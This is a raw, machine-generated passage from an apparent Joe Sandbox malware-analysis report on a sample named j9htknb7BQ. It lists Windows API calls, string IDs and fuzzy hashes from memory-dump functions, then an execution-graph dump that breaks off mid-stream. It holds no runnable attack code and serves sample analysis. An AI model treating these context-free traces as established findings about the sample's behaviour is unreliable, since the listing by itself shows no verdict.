                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID:
                                                                          • API String ID: 3782394904-0
                                                                          • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                          • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                          • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                          • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                          • ExitProcess.KERNEL32 ref: 00403DE5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ExitMessageProcess
                                                                          • String ID: Error$Runtime error at 00000000$9@
                                                                          • API String ID: 1220098344-1503883590
                                                                          • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                          • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                          • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                          • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 262959230-0
                                                                          • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                          • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                          • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                          • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                          • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CommandHandleLineModule
                                                                          • String ID: U1hd.@$`&\
                                                                          • API String ID: 2123368496-962632401
                                                                          • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                          • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                          • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                          • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID:
                                                                          • API String ID: 730355536-0
                                                                          • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                          • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                          • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                          • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID: )q@
                                                                          • API String ID: 3660427363-2284170586
                                                                          • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                          • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                          • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                          • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                          APIs
                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 1458359878-0
                                                                          • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                          • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                          • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                          • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                          Execution Graph

                                                                          Execution Coverage:14.3%
                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                          Signature Coverage:4.4%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:87
60419->60439 60420 4205f6 60420->60416 60420->60419 60427 420652 MulDiv 60420->60427 60425 42067a 60425->60416 60440 420070 12 API calls 60425->60440 60438 41a314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 60427->60438 60430 420697 60431 4206b3 MulDiv 60430->60431 60432 4206d6 60430->60432 60431->60432 60432->60416 60433 4206df MulDiv 60432->60433 60433->60416 60435 415b52 60434->60435 60444 414480 60435->60444 60437 415b6a 60437->60420 60438->60419 60439->60425 60440->60430 60441->60417 60442->60418 60443->60424 60445 41449a 60444->60445 60448 410658 60445->60448 60447 4144b0 60447->60437 60451 40dea4 60448->60451 60450 41065e 60450->60447 60452 40df06 60451->60452 60453 40deb7 60451->60453 60458 40df14 60452->60458 60456 40df14 19 API calls 60453->60456 60457 40dee1 60456->60457 60457->60450 60459 40df24 60458->60459 60461 40df3a 60459->60461 60470 40d7e0 60459->60470 60490 40e29c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60459->60490 60473 40e14c 60461->60473 60464 40d7e0 5 API calls 60465 40df42 60464->60465 60465->60464 60466 40dfae 60465->60466 60476 40dd60 60465->60476 60468 40e14c 5 API calls 60466->60468 60469 40df10 60468->60469 60469->60450 60491 40ec08 60470->60491 60499 40d6bc 60473->60499 60477 40e154 5 API calls 60476->60477 60478 40dd93 60477->60478 60479 40eb6c 5 API calls 60478->60479 60480 40dd9e 60479->60480 60481 40eb6c 5 API calls 60480->60481 60482 40dda9 60481->60482 60483 40ddc4 60482->60483 60484 40ddbb 60482->60484 60489 40ddc1 60482->60489 60508 40dbd8 60483->60508 60511 40dcc8 19 API calls 60484->60511 60487 403420 4 API calls 60488 40de8f 60487->60488 60488->60465 60489->60487 60490->60459 60494 40d980 60491->60494 60496 40d98b 60494->60496 60495 40d7ea 60495->60459 60496->60495 60498 40d9cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60496->60498 60498->60496 60500 40ec08 5 API calls 60499->60500 60501 40d6c9 60500->60501 60502 40d6dc 60501->60502 60506 40ed0c LocalAlloc TlsSetValue 
TlsGetValue TlsGetValue LoadStringA 60501->60506 60502->60465 60504 40d6d7 60507 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60504->60507 60506->60504 60507->60502 60512 40ad7c 19 API calls 60508->60512 60510 40dc00 60510->60489 60511->60489 60512->60510 60513 440be8 60514 440bf1 60513->60514 60515 440bff WriteFile 60513->60515 60514->60515 60516 440c0a 60515->60516 52555 41364c SetWindowLongA GetWindowLongA 52556 4136a9 SetPropA SetPropA 52555->52556 52557 41368b GetWindowLongA 52555->52557 52561 41f3ac 52556->52561 52557->52556 52558 41369a SetWindowLongA 52557->52558 52558->52556 52566 415280 52561->52566 52573 423c1c 52561->52573 52667 423a94 52561->52667 52562 4136f9 52567 41528d 52566->52567 52568 4152f3 52567->52568 52569 4152e8 52567->52569 52572 4152f1 52567->52572 52674 424b9c 13 API calls 52568->52674 52569->52572 52675 41506c 46 API calls 52569->52675 52572->52562 52576 423c52 52573->52576 52594 423c73 52576->52594 52676 423b78 52576->52676 52577 423cfc 52579 423d03 52577->52579 52580 423d37 52577->52580 52578 423c9d 52581 423ca3 52578->52581 52582 423d60 52578->52582 52589 423d09 52579->52589 52626 423fc1 52579->52626 52585 423d42 52580->52585 52586 4240aa IsIconic 52580->52586 52583 423cd5 52581->52583 52584 423ca8 52581->52584 52587 423d72 52582->52587 52588 423d7b 52582->52588 52583->52594 52615 423cee 52583->52615 52616 423e4f 52583->52616 52590 423e06 52584->52590 52591 423cae 52584->52591 52592 4240e6 52585->52592 52593 423d4b 52585->52593 52586->52594 52598 4240be GetFocus 52586->52598 52595 423d88 52587->52595 52596 423d79 52587->52596 52691 4241a4 11 API calls 52588->52691 52599 423f23 SendMessageA 52589->52599 52600 423d17 52589->52600 52704 423b94 NtdllDefWindowProc_A 52590->52704 52601 423cb7 52591->52601 52602 423e2e PostMessageA 52591->52602 52724 424860 WinHelpA PostMessageA 52592->52724 52605 4240fd 52593->52605 52624 423cd0 52593->52624 52594->52562 52692 4241ec IsIconic 52595->52692 52700 423b94 
NtdllDefWindowProc_A 52596->52700 52598->52594 52607 4240cf 52598->52607 52599->52594 52600->52594 52600->52624 52645 423f66 52600->52645 52610 423cc0 52601->52610 52611 423eb5 52601->52611 52710 423b94 NtdllDefWindowProc_A 52602->52710 52613 424106 52605->52613 52614 42411b 52605->52614 52723 41f004 GetCurrentThreadId 73A15940 52607->52723 52619 423cc9 52610->52619 52620 423dde IsIconic 52610->52620 52621 423ebe 52611->52621 52622 423eef 52611->52622 52612 423e49 52612->52594 52725 4244e4 52613->52725 52731 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 52614->52731 52615->52624 52625 423e1b 52615->52625 52680 423b94 NtdllDefWindowProc_A 52616->52680 52618 4240d6 52618->52594 52629 4240de SetFocus 52618->52629 52619->52624 52630 423da1 52619->52630 52632 423dfa 52620->52632 52633 423dee 52620->52633 52631 423b24 5 API calls 52621->52631 52687 423b94 NtdllDefWindowProc_A 52622->52687 52624->52594 52690 423b94 NtdllDefWindowProc_A 52624->52690 52705 424188 52625->52705 52626->52594 52639 423fe7 IsWindowEnabled 52626->52639 52629->52594 52630->52594 52701 422c5c ShowWindow PostMessageA PostQuitMessage 52630->52701 52638 423ec6 52631->52638 52703 423b94 NtdllDefWindowProc_A 52632->52703 52702 423bd0 15 API calls 52633->52702 52637 423e55 52643 423e93 52637->52643 52644 423e71 52637->52644 52649 423ed8 52638->52649 52711 41ef68 52638->52711 52639->52594 52650 423ff5 52639->52650 52642 423ef5 52651 423f0d 52642->52651 52688 41eeb4 GetCurrentThreadId 73A15940 52642->52688 52647 423a94 6 API calls 52643->52647 52681 423b24 52644->52681 52645->52594 52652 423f88 IsWindowEnabled 52645->52652 52654 423e9b PostMessageA 52647->52654 52717 423b94 NtdllDefWindowProc_A 52649->52717 52660 423ffc IsWindowVisible 52650->52660 52658 423a94 6 API calls 52651->52658 52652->52594 52659 423f96 52652->52659 52654->52594 52658->52594 52718 412320 7 API calls 52659->52718 52660->52594 52662 42400a GetFocus 52660->52662 52719 4181f0 52662->52719 52664 42401f SetFocus 
52721 415250 52664->52721 52668 423b1d 52667->52668 52669 423aa4 52667->52669 52668->52562 52669->52668 52670 423aaa EnumWindows 52669->52670 52670->52668 52671 423ac6 GetWindow GetWindowLongA 52670->52671 52863 423a2c GetWindow 52670->52863 52672 423ae5 52671->52672 52672->52668 52673 423b11 SetWindowPos 52672->52673 52673->52668 52673->52672 52674->52572 52675->52572 52677 423b82 52676->52677 52678 423b8d 52676->52678 52677->52678 52732 408728 GetSystemDefaultLCID 52677->52732 52678->52577 52678->52578 52680->52637 52682 423b72 PostMessageA 52681->52682 52683 423b33 52681->52683 52682->52594 52683->52682 52684 423b6a 52683->52684 52686 423b5e SetWindowPos 52683->52686 52835 40b3d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52684->52835 52686->52683 52686->52684 52687->52642 52689 41ef39 52688->52689 52689->52651 52690->52594 52691->52594 52693 4241fd SetActiveWindow 52692->52693 52697 424233 52692->52697 52836 42365c 52693->52836 52696 423b24 5 API calls 52698 42421a 52696->52698 52697->52594 52698->52697 52699 42422d SetFocus 52698->52699 52699->52697 52700->52594 52701->52594 52702->52594 52703->52594 52704->52594 52848 41db40 52705->52848 52708 4241a0 52708->52594 52709 424194 LoadIconA 52709->52708 52710->52612 52712 41ef70 IsWindow 52711->52712 52713 41ef9c 52711->52713 52714 41ef7f EnableWindow 52712->52714 52716 41ef8a 52712->52716 52713->52649 52714->52716 52715 402660 4 API calls 52715->52716 52716->52712 52716->52713 52716->52715 52717->52594 52718->52594 52720 4181fa 52719->52720 52720->52664 52722 41526b SetFocus 52721->52722 52722->52594 52723->52618 52724->52612 52726 4244f0 52725->52726 52727 42450a 52725->52727 52728 4244f7 SendMessageA 52726->52728 52730 42451f 52726->52730 52729 402648 4 API calls 52727->52729 52728->52730 52729->52730 52730->52594 52731->52612 52787 408570 GetLocaleInfoA 52732->52787 52737 408570 5 API calls 52738 40877d 52737->52738 52739 408570 5 API calls 52738->52739 52740 4087a1 52739->52740 52799 4085bc GetLocaleInfoA 
52740->52799 52743 4085bc GetLocaleInfoA 52744 4087d1 52743->52744 52745 408570 5 API calls 52744->52745 52746 4087eb 52745->52746 52747 4085bc GetLocaleInfoA 52746->52747 52748 408808 52747->52748 52749 408570 5 API calls 52748->52749 52750 408822 52749->52750 52751 403450 4 API calls 52750->52751 52752 40882f 52751->52752 52753 408570 5 API calls 52752->52753 52754 408844 52753->52754 52755 403450 4 API calls 52754->52755 52756 408851 52755->52756 52757 4085bc GetLocaleInfoA 52756->52757 52758 40885f 52757->52758 52759 408570 5 API calls 52758->52759 52760 408879 52759->52760 52761 403450 4 API calls 52760->52761 52762 408886 52761->52762 52763 408570 5 API calls 52762->52763 52764 40889b 52763->52764 52765 403450 4 API calls 52764->52765 52788 408597 52787->52788 52789 4085a9 52787->52789 52815 4034e0 52788->52815 52791 403494 4 API calls 52789->52791 52792 4085a7 52791->52792 52793 403450 52792->52793 52794 403454 52793->52794 52797 403464 52793->52797 52796 4034bc 4 API calls 52794->52796 52794->52797 52795 403490 52795->52737 52796->52797 52797->52795 52830 402660 52797->52830 52800 4085d8 52799->52800 52800->52743 52820 4034bc 52815->52820 52817 4034f0 52818 403400 4 API calls 52817->52818 52819 403508 52818->52819 52819->52792 52821 4034c0 52820->52821 52822 4034dc 52820->52822 52825 402648 52821->52825 52822->52817 52824 4034c9 52824->52817 52826 40264c 52825->52826 52827 402656 52825->52827 52826->52827 52829 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52826->52829 52827->52824 52827->52827 52829->52827 52831 402664 52830->52831 52832 40266e 52830->52832 52831->52832 52834 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52831->52834 52832->52795 52832->52832 52834->52832 52835->52682 52844 423608 SystemParametersInfoA 52836->52844 52839 423675 ShowWindow 52841 423680 52839->52841 52842 423687 52839->52842 52847 423638 SystemParametersInfoA 52841->52847 52842->52696 52845 423626 52844->52845 52845->52839 52846 423638 SystemParametersInfoA 
52845->52846 52846->52839 52847->52842 52851 41db64 52848->52851 52852 41db4a 52851->52852 52853 41db71 52851->52853 52852->52708 52852->52709 52853->52852 52860 40cc80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52853->52860 52855 41db8e 52855->52852 52856 41dba8 52855->52856 52857 41db9b 52855->52857 52861 41bd9c 11 API calls 52856->52861 52862 41b398 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52857->52862 52860->52855 52861->52852 52862->52852 52864 423a4d GetWindowLongA 52863->52864 52865 423a59 52863->52865 52864->52865 52866 490c98 52867 490ccc 52866->52867 52868 490cce 52867->52868 52869 490ce2 52867->52869 53012 4467f0 18 API calls 52868->53012 52872 490d1e 52869->52872 52873 490cf1 52869->52873 52871 490cd7 Sleep 52933 490d55 52871->52933 52878 490d5a 52872->52878 52879 490d2d 52872->52879 52875 44684c 18 API calls 52873->52875 52877 490d00 52875->52877 52881 490d08 FindWindowA 52877->52881 52884 490d69 52878->52884 52885 490db0 52878->52885 53002 44684c 52879->53002 52883 446acc 5 API calls 52881->52883 52882 490d3a 52886 490d42 FindWindowA 52882->52886 52913 490d19 52883->52913 53013 4467f0 18 API calls 52884->53013 52890 490e0c 52885->52890 52891 490dbf 52885->52891 53006 446acc 52886->53006 52889 490d75 53014 4467f0 18 API calls 52889->53014 52898 490e1b 52890->52898 52904 490e68 52890->52904 53017 4467f0 18 API calls 52891->53017 52893 490d82 53015 4467f0 18 API calls 52893->53015 52896 490dcb 53018 4467f0 18 API calls 52896->53018 52897 490d8f 53016 4467f0 18 API calls 52897->53016 53022 4467f0 18 API calls 52898->53022 52902 490dd8 53019 4467f0 18 API calls 52902->53019 52903 490d9a SendMessageA 52908 446acc 5 API calls 52903->52908 52909 490ea2 52904->52909 52910 490e77 52904->52910 52905 490e27 53023 4467f0 18 API calls 52905->53023 52907 490de5 53020 4467f0 18 API calls 52907->53020 52908->52913 52919 490eb1 52909->52919 52920 490ef0 52909->52920 52914 44684c 18 API calls 52910->52914 52913->52933 52917 490e84 
52914->52917 52915 490e34 53024 4467f0 18 API calls 52915->53024 52916 490df0 PostMessageA 53021 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52916->53021 52924 490e8c RegisterClipboardFormatA 52917->52924 53027 4467f0 18 API calls 52919->53027 52931 490eff 52920->52931 52932 490f44 52920->52932 52922 490e41 53025 4467f0 18 API calls 52922->53025 52928 446acc 5 API calls 52924->52928 52926 490e4c SendNotifyMessageA 53026 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52926->53026 52927 490ebd 53028 4467f0 18 API calls 52927->53028 52928->52933 53030 4467f0 18 API calls 52931->53030 52939 490f98 52932->52939 52940 490f53 52932->52940 53052 403420 52933->53052 52934 490eca 53029 4467f0 18 API calls 52934->53029 52937 490f0b 53031 4467f0 18 API calls 52937->53031 52938 490ed5 SendMessageA 52943 446acc 5 API calls 52938->52943 52948 490ffa 52939->52948 52949 490fa7 52939->52949 53034 4467f0 18 API calls 52940->53034 52942 490f18 53032 4467f0 18 API calls 52942->53032 52943->52913 52946 490f5f 53035 4467f0 18 API calls 52946->53035 52947 490f23 PostMessageA 53033 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52947->53033 52956 491009 52948->52956 52957 491081 52948->52957 52952 44684c 18 API calls 52949->52952 52954 490fb4 52952->52954 52953 490f6c 53036 4467f0 18 API calls 52953->53036 53038 42e2bc SetErrorMode 52954->53038 52960 44684c 18 API calls 52956->52960 52967 491090 52957->52967 52968 4910b6 52957->52968 52959 490f77 SendNotifyMessageA 53037 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52959->53037 52963 491018 52960->52963 52961 490fc1 52964 490fd7 GetLastError 52961->52964 52965 490fc7 52961->52965 53041 4467f0 18 API calls 52963->53041 52969 446acc 5 API calls 52964->52969 52966 446acc 5 API calls 52965->52966 52970 490fd5 52966->52970 53046 4467f0 18 API calls 52967->53046 52975 4910e8 52968->52975 52976 4910c5 52968->52976 52969->52970 52974 446acc 5 API calls 
52970->52974 52973 49109a FreeLibrary 53047 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52973->53047 52974->52933 52985 4910f7 52975->52985 52991 49112b 52975->52991 52979 44684c 18 API calls 52976->52979 52977 49102b GetProcAddress 52980 491071 52977->52980 52981 491037 52977->52981 52982 4910d1 52979->52982 53045 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52980->53045 53042 4467f0 18 API calls 52981->53042 52987 4910d9 CreateMutexA 52982->52987 53048 48ae84 18 API calls 52985->53048 52986 491043 53043 4467f0 18 API calls 52986->53043 52987->52933 52990 491050 52994 446acc 5 API calls 52990->52994 52991->52933 53050 48ae84 18 API calls 52991->53050 52993 491103 52995 491114 OemToCharBuffA 52993->52995 52996 491061 52994->52996 53049 48ae9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52995->53049 53044 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52996->53044 52999 491146 53000 491157 CharToOemBuffA 52999->53000 53051 48ae9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53000->53051 53003 446854 53002->53003 53056 4358cc 53003->53056 53005 446873 53005->52882 53007 446ad4 53006->53007 53082 435c34 VariantClear 53007->53082 53009 446af7 53010 446b0e 53009->53010 53083 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53009->53083 53010->52933 53012->52871 53013->52889 53014->52893 53015->52897 53016->52903 53017->52896 53018->52902 53019->52907 53020->52916 53021->52913 53022->52905 53023->52915 53024->52922 53025->52926 53026->52933 53027->52927 53028->52934 53029->52938 53030->52937 53031->52942 53032->52947 53033->52913 53034->52946 53035->52953 53036->52959 53037->52933 53084 403738 53038->53084 53041->52977 53042->52986 53043->52990 53044->52913 53045->52913 53046->52973 53047->52933 53048->52993 53049->52933 53050->52999 53051->52933 53053 403426 53052->53053 53054 40344b 53053->53054 53055 402660 4 API calls 53053->53055 53055->53053 53057 4358d8 
53056->53057 53058 4358fa 53056->53058 53057->53058 53076 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53057->53076 53059 43597d 53058->53059 53061 435941 53058->53061 53062 435971 53058->53062 53063 435965 53058->53063 53064 43594d 53058->53064 53073 435959 53058->53073 53081 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53059->53081 53077 403510 53061->53077 53080 4040e8 18 API calls 53062->53080 53068 403494 4 API calls 53063->53068 53067 403510 4 API calls 53064->53067 53072 435956 53067->53072 53074 43596e 53068->53074 53071 43598e 53071->53005 53072->53005 53073->53005 53074->53005 53075 43597a 53075->53005 53076->53058 53078 4034e0 4 API calls 53077->53078 53079 40351d 53078->53079 53079->53005 53080->53075 53081->53071 53082->53009 53083->53010 53085 40373c LoadLibraryA 53084->53085 53085->52961 53086 416b52 53087 416bfa 53086->53087 53088 416b6a 53086->53088 53105 41532c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53087->53105 53090 416b84 SendMessageA 53088->53090 53091 416b78 53088->53091 53092 416bd8 53090->53092 53093 416b82 CallWindowProcA 53091->53093 53094 416b9e 53091->53094 53093->53092 53102 41a068 GetSysColor 53094->53102 53097 416ba9 SetTextColor 53098 416bbe 53097->53098 53103 41a068 GetSysColor 53098->53103 53100 416bc3 SetBkColor 53104 41a6f0 GetSysColor CreateBrushIndirect 53100->53104 53102->53097 53103->53100 53104->53092 53105->53092 60517 40ce34 60520 406f18 WriteFile 60517->60520 60521 406f35 60520->60521 53106 416654 53107 416661 53106->53107 53108 4166bb 53106->53108 53113 416560 CreateWindowExA 53107->53113 53109 416668 SetPropA SetPropA 53109->53108 53110 41669b 53109->53110 53111 4166ae SetWindowPos 53110->53111 53111->53108 53113->53109 53114 42e317 SetErrorMode 53115 42f394 53116 42f3a3 NtdllDefWindowProc_A 53115->53116 53117 42f39f 53115->53117 53116->53117 60522 4222f4 60523 422303 60522->60523 60528 421284 60523->60528 60527 422323 60529 4212f3 60528->60529 60530 421293 60528->60530 60534 421304 
